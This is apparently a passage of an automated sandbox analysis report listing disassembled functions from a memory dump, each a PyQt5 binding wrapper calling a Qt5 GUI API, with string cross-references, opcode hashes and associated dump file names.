API ID: ?setPainterPathStroker@@Width@
String ID: QPainterPathStroker$setWidth$setWidth(self, width: float)
API String ID: 3065382441-1129810175
Opcode ID: eff608b3996116dd0c74047892d678cae0fd909dd35f51b1b5bba5c94407da1d
Instruction ID: ee18254640907f108c78e5c8d6d1cc194637528554580dfdfcf17480b13044a2
Opcode Fuzzy Hash: eff608b3996116dd0c74047892d678cae0fd909dd35f51b1b5bba5c94407da1d
Instruction Fuzzy Hash: 65110075B08E4AD1EB00AF25E8996AD33B9FB44BA4FA54032CA0D03320DF3DD94AC740

Function 00007FFD86252A90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?intProperty@QTextFormat@@QEBAHH@Z.QT5GUI ref: 00007FFD86252AE0

Strings

leftBorderStyle(self) -> QTextFrameFormat.BorderStyle, xrefs: 00007FFD86252B08
QTextTableCellFormat, xrefs: 00007FFD86252B1B
leftBorderStyle, xrefs: 00007FFD86252B14

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?intFormat@@Property@Text
String ID: QTextTableCellFormat$leftBorderStyle$leftBorderStyle(self) -> QTextFrameFormat.BorderStyle
API String ID: 3527681034-267184586
Opcode ID: 363c7398451b9036257286542bbc7fc1635391021b40d09d59b969787deb9363
Instruction ID: 5ea533881e1492ed5f2eeceb1c27605072d2dd604d8b22a166d05b2caec68a1f
Opcode Fuzzy Hash: 363c7398451b9036257286542bbc7fc1635391021b40d09d59b969787deb9363
Instruction Fuzzy Hash: 0211E975B08A86C2EB009F65E8A96AD37A4FB48BA4F954072CA4D43320DF7DD949C740

Function 00007FFD86250E60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?transientParent@QWindow@@QEBAPEAV1@XZ.QT5GUI ref: 00007FFD86250EAB

Strings

transientParent, xrefs: 00007FFD86250EE3
QWindow, xrefs: 00007FFD86250EEA
transientParent(self) -> Optional[QWindow], xrefs: 00007FFD86250ED7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?transientParent@Window@@
String ID: QWindow$transientParent$transientParent(self) -> Optional[QWindow]
API String ID: 2973953095-1021787442
Opcode ID: bd5ed4561ebcff6442460d0a1b4d498d3f3e34a08435c94c6858acc695c17da2
Instruction ID: ca2beda52e8f6b66138f44112b638c2e16b45583cb45adfae1648c0156c67cd4
Opcode Fuzzy Hash: bd5ed4561ebcff6442460d0a1b4d498d3f3e34a08435c94c6858acc695c17da2
Instruction Fuzzy Hash: FF014C75B08A4AD1EB00DF69E8A86AD37A4FB44BA4F954072CA4D43320DF7DD98AC740

Function 00007FFD86244EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?fromScale@QTransform@@SA?AV1@NN@Z.QT5GUI ref: 00007FFD86244F02

Strings

fromScale, xrefs: 00007FFD86244F3A
QTransform, xrefs: 00007FFD86244F41
fromScale(dx: float, dy: float) -> QTransform, xrefs: 00007FFD86244F2E

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?fromScale@Transform@@malloc
String ID: QTransform$fromScale$fromScale(dx: float, dy: float) -> QTransform
API String ID: 3842683458-3728968616
Opcode ID: d0ad05c65bc43e16bb37d0af895e2ec6e55c35f8f62396af95fae2c781a3590d
Instruction ID: 5a2625bdf398aa20cc84d00760fe5717560c40544ac559aa612b24004c485a79
Opcode Fuzzy Hash: d0ad05c65bc43e16bb37d0af895e2ec6e55c35f8f62396af95fae2c781a3590d
Instruction Fuzzy Hash: F4015B3571CB86D2EA00AF25E8247AA27A1FB84BA4F845032DA4E07720DF3CE909C740

Function 00007FFD86262AA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?intProperty@QTextFormat@@QEBAHH@Z.QT5GUI ref: 00007FFD86262AF0

Strings

borderStyle(self) -> QTextFrameFormat.BorderStyle, xrefs: 00007FFD86262B18
QTextFrameFormat, xrefs: 00007FFD86262B2B
borderStyle, xrefs: 00007FFD86262B24

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?intFormat@@Property@Text
String ID: QTextFrameFormat$borderStyle$borderStyle(self) -> QTextFrameFormat.BorderStyle
API String ID: 3527681034-3901134609
Opcode ID: 0887f11106cb09a19a35578ba0dcda90d0f18f04dca6d33a8288bdccd7bc4719
Instruction ID: a7dd924ee590eb3a0eaa68fec7517d285ef8eafa4b54e0f7504f5e53453b9811
Opcode Fuzzy Hash: 0887f11106cb09a19a35578ba0dcda90d0f18f04dca6d33a8288bdccd7bc4719
Instruction Fuzzy Hash: A0112575B08A4AC1EB009F64E8A86AD37A4FB94BA4F954072CA4D43330DF7CD94AC740

Function 00007FFD86254F60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?currentFrame@QTextCursor@@QEBAPEAVQTextFrame@@XZ.QT5GUI ref: 00007FFD86254FAB

Strings

QTextCursor, xrefs: 00007FFD86254FEA
currentFrame, xrefs: 00007FFD86254FE3
currentFrame(self) -> Optional[QTextFrame], xrefs: 00007FFD86254FD7

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?currentCursor@@Frame@Frame@@
String ID: QTextCursor$currentFrame$currentFrame(self) -> Optional[QTextFrame]
API String ID: 2973672026-2279609829
Opcode ID: f7be35cbdbde40f0883a9e029973cf3bccadf0df9581cf77fd137813b6776b38
Instruction ID: 3ed5a954f5a89c6eaf2b4333b9de054d610d007b1698a0019f57a95760c28d8e
Opcode Fuzzy Hash: f7be35cbdbde40f0883a9e029973cf3bccadf0df9581cf77fd137813b6776b38
Instruction Fuzzy Hash: 99014C75B08A46C1EB00DF65E8A86AD33A4FB54BA5F954072CA4D43330DF7DD949C780

Function 00007FFD86284FA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?intProperty@QTextFormat@@QEBAHH@Z.QT5GUI ref: 00007FFD86284FF0

Strings

fontStyleHint(self) -> QFont.StyleHint, xrefs: 00007FFD86285018
fontStyleHint, xrefs: 00007FFD86285024
QTextCharFormat, xrefs: 00007FFD8628502B

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?intFormat@@Property@Text
String ID: QTextCharFormat$fontStyleHint$fontStyleHint(self) -> QFont.StyleHint
API String ID: 3527681034-745533525
Opcode ID: 5b4b7219b9cce4abdce49bcd3daf7469f9598b860e3681afdf95f9dcff7143a4
Instruction ID: 7e934493c6a83a58503650662b1fae8bd32ced2631b3765cb96038711c6cc607
Opcode Fuzzy Hash: 5b4b7219b9cce4abdce49bcd3daf7469f9598b860e3681afdf95f9dcff7143a4
Instruction Fuzzy Hash: 31114C35B08B4AC1EB00DF69E8A86AD37A4FB58BA4F954072CA0D03320DF7DD949C380

Function 00007FFD86244C90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?fromTranslate@QTransform@@SA?AV1@NN@Z.QT5GUI ref: 00007FFD86244CE2

Strings

fromTranslate, xrefs: 00007FFD86244D1A
fromTranslate(dx: float, dy: float) -> QTransform, xrefs: 00007FFD86244D0E
QTransform, xrefs: 00007FFD86244D21

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?fromTransform@@Translate@malloc
String ID: QTransform$fromTranslate$fromTranslate(dx: float, dy: float) -> QTransform
API String ID: 3160360949-3903893780
Opcode ID: 66d03dac3a38d1abe508550a5cbfd7cf10d8c14dad5b21001cbc1eb09200ebfb
Instruction ID: fce9c3731fa725fe2ad2d538bea57833c3d63d3c3f143df7ed0e930bc882d09c
Opcode Fuzzy Hash: 66d03dac3a38d1abe508550a5cbfd7cf10d8c14dad5b21001cbc1eb09200ebfb
Instruction Fuzzy Hash: 4D015B3571CB8682EB00AF25E8687AE6760FB84BA4F844032D64E03720DF3CE909C740

Function 00007FFD862A2CC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?parentFrame@QTextFrame@@QEBAPEAV1@XZ.QT5GUI ref: 00007FFD862A2D0B

Strings

parentFrame(self) -> Optional[QTextFrame], xrefs: 00007FFD862A2D37
QTextFrame, xrefs: 00007FFD862A2D4A
parentFrame, xrefs: 00007FFD862A2D43

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?parentFrame@Frame@@Text
String ID: QTextFrame$parentFrame$parentFrame(self) -> Optional[QTextFrame]
API String ID: 3741133204-4014253223
Opcode ID: f2938a8fb4f259bc14e8f4b881e70d0206a5c2d999f486f3c1d6242372a15880
Instruction ID: 0a128258e95ffcff61d013e89f32191d5ce1d8e73dd481a0b48c4959c25e087d
Opcode Fuzzy Hash: f2938a8fb4f259bc14e8f4b881e70d0206a5c2d999f486f3c1d6242372a15880
Instruction Fuzzy Hash: BA014C75B08A46D1EB00DF65E8A86AD33A8FB48BA1F954072CA4D43330DF7CD989C340

Function 00007FFD8628CE10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?textList@QTextBlock@@QEBAPEAVQTextList@@XZ.QT5GUI ref: 00007FFD8628CE5B

Strings

QTextBlock, xrefs: 00007FFD8628CE9A
textList(self) -> Optional[QTextList], xrefs: 00007FFD8628CE87
textList, xrefs: 00007FFD8628CE93

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?textBlock@@List@List@@
String ID: QTextBlock$textList$textList(self) -> Optional[QTextList]
API String ID: 1646250731-3193207460
Opcode ID: 2f5eaa9a46fd951493213a310a8a7352b9765747ad04321775bc0df37b019f39
Instruction ID: 874b66d94f964d84137a8201f6b12b8fa5f63f8fa05399d32a3943cfb4f510dc
Opcode Fuzzy Hash: 2f5eaa9a46fd951493213a310a8a7352b9765747ad04321775bc0df37b019f39
Instruction Fuzzy Hash: 49012575B0CA86C1EB009F65E8A86AD37A4FB48BA4F954072CA4D43320DF7DD989C780

Function 00007FFD8624AE90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?textDirection@QTextInlineObject@@QEBA?AW4LayoutDirection@Qt@@XZ.QT5GUI ref: 00007FFD8624AEDB

Strings

QTextInlineObject, xrefs: 00007FFD8624AF16
textDirection(self) -> Qt.LayoutDirection, xrefs: 00007FFD8624AF03
textDirection, xrefs: 00007FFD8624AF0F

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
